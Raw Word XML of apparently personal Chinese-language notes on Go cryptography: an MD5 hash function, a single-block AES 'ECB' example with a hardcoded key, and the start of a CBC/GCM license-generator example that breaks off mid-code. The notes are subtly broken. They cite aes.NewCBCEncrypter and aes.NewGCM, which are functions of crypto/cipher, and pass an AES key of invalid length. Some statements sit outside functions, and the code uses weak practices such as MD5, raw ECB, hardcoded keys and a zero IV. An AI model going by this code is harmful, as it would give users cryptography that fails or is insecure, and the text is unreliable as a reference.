    <w:p w14:paraId="374F5EFA" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB7528" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA85A8" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="437636E7" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func MD5(v string)string{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29251097" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>d := []byte(v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA2E13" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>m := md5.New()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C651BD" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>m.Write(d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A9A66" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return hex.EncodeToString(m.Sum(nil))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342139F" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F78910" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B51FD89" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637838A0" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(MD5("123456"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33454918" w14:textId="16213363" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B2E69" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2FDA5F" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRPr="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CF7084" w14:textId="619FE30D" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D562AB">
        <w:t>aes</w:t>
      </w:r>
      <w:r w:rsidR="001D7388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：默认</w:t>
      </w:r>
      <w:r w:rsidR="001D7388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ECB</w:t>
      </w:r>
      <w:r w:rsidR="001D7388">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D7388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pkcs</w:t>
      </w:r>
      <w:r w:rsidR="001D7388">
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="001D7388">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但不能指定其他方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6CE6FF" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD02FD8" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C86888" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "crypto/aes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EF4EF" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "encoding/hex"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FDAE5" w14:textId="52DB3E59" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C1EF64" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C099BE8" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func EncryptAES(key []byte, plaintext string) string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEDF2F" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // create cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB4E7FD" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0298">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c, err := aes.NewCipher(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934AD8E" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    CheckError(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F2CF7E" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420EE360" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // allocate space for ciphered data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035A21B" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    out := make([]byte, len(plaintext))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498C38B" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63928E40" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // encrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08681687" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRPr="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0298">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c.Encrypt(out, []byte(plaintext))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34F464" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // return hex string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36904E69" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return hex.EncodeToString(out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CE0D1" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B15976" w14:textId="77777777" w:rsidR="00AD0298" w:rsidRDefault="00AD0298" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578899A7" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// cipher key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B7F19" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>key := "thisis32bitlongpassphraseimusing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7BD58" w14:textId="11640950" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B7BBF3" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31123B10" w14:textId="75CB4005" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pt := "This is a secret"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78026C1C" w14:textId="45C60187" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>c := EncryptAES([]byte(key), pt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5517E0E4" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EDC6B1" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4569EB20" w14:textId="640EC230" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：支持自定义分组密码模式、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BC363" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在标准库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto/cipher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Block </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口主要提供了块密码的基本加密和解密操作，而不涉及具体的分组密码模式、填充方式或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Initialization Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14636564" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133D8332" w14:textId="44355830" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你希望使用特定的分组密码模式、填充方式和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto/cipher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包中的具体实现，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> aes.NewCBCEncrypter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> aes.NewGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。下面是一个示例，演示如何指定分组密码模式（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、填充方式（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PKCS7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02461332" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72102530" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F88C9" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DF8C05" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B5F2D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"crypto/aes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F2680" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"crypto/cipher"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284F5A8" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"encoding/hex"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D12339" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40F87A" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A89580F" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203F51D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDF462F" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C943B3D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ip := "192.168.1.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1558D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>time := "2022-01-01 12:00:00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BB327" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>key := "shanxichuangzhiwuseshirenzongxvzonggongzuoshunliwanshiruyishentijiankangpinganxilexxxxxxxxxxxxxxxxxxxsdasdqwe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284AA19" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567E4D22" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>encrypted := LicenseGeneratorCBC(ip, time, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4661F934" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("Encrypted (CBC):", encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A2104A" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F57BCE6" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>encryptedGCM := LicenseGeneratorGCM(ip, time, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6B179" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("Encrypted (GCM):", encryptedGCM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A035AB4" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB8CE0" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F182CEA" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func LicenseGeneratorCBC(ip, time, key string) string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FE80C" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Create cipher block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5E26F" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>c, err := aes.NewCipher([]byte(key))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FCA081" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA64914" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E8AC3" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212E367B" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04ECC5C8" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// PKCS7 Padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C4CDF" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>plaintext := pkcs7Pad([]byte(ip + time), c.BlockSize())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CDB7DD" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A13839C" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>// IV should be unique for every encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ACC7EB" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>iv := make([]byte, c.BlockSize())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E70D2" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// You should use a secure random number generator to fill the IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAD1BB" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
